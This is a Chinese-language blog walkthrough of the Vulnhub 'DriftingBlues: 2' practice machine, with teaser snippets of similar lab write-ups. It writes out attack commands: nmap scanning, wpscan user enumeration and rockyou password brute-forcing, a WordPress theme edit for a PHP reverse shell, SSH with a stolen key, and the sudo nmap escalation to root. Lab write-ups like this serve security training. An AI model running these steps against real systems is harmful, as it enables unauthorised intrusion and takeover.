信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.207

80端口的/blog目录为wordpress

wpscan收集wordpress用户和爆破密码

wpscan --url http://driftingblues.box/blog -e u,ap --plugins-detection mixed
wpscan --url http://driftingblues.box/blog -U albert -P /usr/share/wordlists/rockyou.txt

登录wordpress后台修改源码执行php反弹shell，用户：albert，密码：scotland1

访问http://driftingblues.box/blog/wp-content/themes/twentyeleven/404.php获得反弹shell

提权

发现freddie用户的私钥

利用私钥连接目标ssh

ssh [email protected] -i id_rsa

freddie用户sudo权限

提权方法：https://gtfobins.github.io/gtfobins/nmap/#sudo

提升为root

TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo -u root nmap --script=$TF

标签：111.207,http,--,DriftingBlues,192.168,blog,-----,Vulnhub,靶机
From： https://www.cnblogs.com/ctostm/p/17644301.html

靶机 red hat enterprise linux 从收集到提权
前言：时间2022年5月22日，在B/S架构上通过用户名dus2进行密码爆破后得到了dus2，拿到了普通用户的shell（权限很低），最终目的拿到root的shell来破环整个服务器。linux提权思路归纳首先开始信息收集，登陆普通用户dsu2 uname-a ......
DC-9靶机
靶机下载地址：http://www.five86.com/downloads/DC-9.zip1.查看kali靶机ip2.nmap192.168.137.0/24 nmap扫描同一网络段的靶机ip地址3.访问靶机192.168.137.154 访问80端口4.查看网站内容信息，在DisplayallRecords里有一些用户信息第三个Search，搜索拿......
【Vulnhub】OSCP
靶场介绍靶场下载地址：https://www.vulnhub.com/entry/infosec-prep-oscp,508/靶场难度：容易kali：192.168.11.5靶机：192.168.11.13信息收集使用nmap扫描靶机开放的端口及服务nmap-A-T4-sS192.168.11.13可以看到靶机开启了22和80端口使用dirb扫描一下目录扫出来一个r......
Vulnhub: MoneyBox: 1靶机
kali：192.168.111.111靶机：192.168.111.194信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.194ftp匿名登录发现trytofind.jpg目录爆破发现blogs目录gobusterdir-uhttp://192.168.111.194-w/usr/share/wordlists/dirbuster/directory-li......
Vulnhub: DriftingBlues: 3靶机
kali：192.168.111.111靶机：192.168.111.192信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.192查看robots.txt得到提示访问eventadmins提示littlequeenofspades.html查看littlequeenofspades.html源码base64解密后提示adminsfixit.php......
Vulnhub 靶场 MATRIX-BREAKOUT: 2 MORPHEUS
前期准备：靶机地址：https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/kali攻击机ip：192.168.11.11靶机ip：192.168.11.12一、信息收集及利用1.使用nmap对目标靶机进行扫描发现开放了22、80、81端口。2.80端口访问80端口：查看页面信息没发现什么重要信息，......
Vulnhub: ColddWorld: Immersion靶机
kali：192.168.111.111靶机：192.168.111.183信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.183查看login的源码发现提示：page和文件/var/carls.txt漏洞利用wfuzz探测account.php页面发现文件包含，参数为pagewfuzz-c-w/opt/zidian/SecLists......
Vulnhub: DriftingBlues: 6靶机
kali：192.168.111.111靶机：192.168.111.180信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.180查看robots.txt发现存在目录：/textpattern/textpattern访问后发现是textpatterncms目录爆破发现文件spammer，访问后发现是个压缩包，解压需要密码，......
Vulnhub: blogger:1靶机
kali：192.168.111.111靶机：192.168.111.176信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.176在80端口的/assets/fonts/目录下发现blog目录，访问后发现为wordpress利用wpscan发现wordpress插件wpdiscuz存在任意文件上传漏洞wpscan--urlhtt......
Vulnhub: hacksudo: aliens靶机
kali：192.168.111.111靶机：192.168.111.175信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.175目标80端口backup目录存在文件mysql.bak，下载后查看获得mysql账号密码登录9000端口的phpmyadmin，执行sql语句写入webshellselect'<?phpsystem($......

Vulnhub: DriftingBlues: 2靶机

信息收集

提权

相关文章

赞助商

阅读排行